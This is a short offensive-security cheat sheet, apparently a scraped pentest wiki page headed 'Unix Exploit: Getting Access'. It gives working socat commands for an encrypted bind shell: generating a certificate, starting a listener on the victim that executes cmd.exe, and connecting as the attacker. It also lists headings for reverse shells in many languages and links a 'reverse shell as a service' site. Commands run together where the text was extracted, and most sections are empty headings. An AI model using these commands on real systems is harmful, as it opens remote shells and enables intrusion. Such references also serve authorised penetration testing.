Unix Exploit
Getting Access
Bind shells
socat
socat - TCP4:$victim_ip:$portopenssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem#listener on victim
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:"C:\Windows\System32\cmd.exe"
#attacker client
socat - OPENSSL:$IP:443,verify=0Reverse Shells
Reverse Shell as a Service - https://shell.now.sh
Bash Reverse Shells
exec Reverse Shell
Python Reverse Shells
PHP Reverse Shell
PHP command injection webshell:
Ruby Reverse Shell
Telnet Reverse Shells
Netcat Reverse Shells
Socat Reverse Shell
Golang Reverse Shell
Perl Reverse Shell
Awk Reverse Shell
NodeJS Reverse Shell
JavaScript Reverse Shell
Java Reverse Shell
C Reverse Shell
XTERM Reverse Shell
Meterpreter Reverse Shells
Upgrading remote shells
Upgrade to fully interactive shell (python example):
Other Languages:
Using "Script" to upgrade to a TTY
Using “Expect” To Get A TTY
Using socat
Misc unsorted
Resources
Last updated